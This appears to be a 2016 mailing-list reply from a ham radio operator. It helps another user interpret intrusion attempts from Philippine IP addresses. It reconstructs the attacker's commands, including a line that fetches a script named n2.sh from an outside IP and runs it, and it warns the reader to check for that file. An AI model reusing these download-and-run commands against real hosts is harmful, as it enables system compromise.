15 Jun
2016
15 Jun
'16
7:26 a.m.
Bill,
First, I noticed:
- All the source IP addresses are allocated to ISPs in the Philippines
- Piecing the information together, I get something more like:
# get 46.183.217.145 -c n2.sh
# n2.sh -g 185.103.109<THIS OCTET IS MISSING FROM THE COMMENTS>
# echo -e 'teot'
CHECK THAT YOU DO NOT FIND A FILE NAMED n2.sh ON YOUR SYSTEM!?!?
I surmise the malicious person is:
- attempting to run 'get' and other commands on your local host;
- and/or trying to send commands through your host - to a 3rd
compromised system
When did you begin running fail2ban and firewalls, for a while, or recently?
73,
- Lynwood
KB3VWG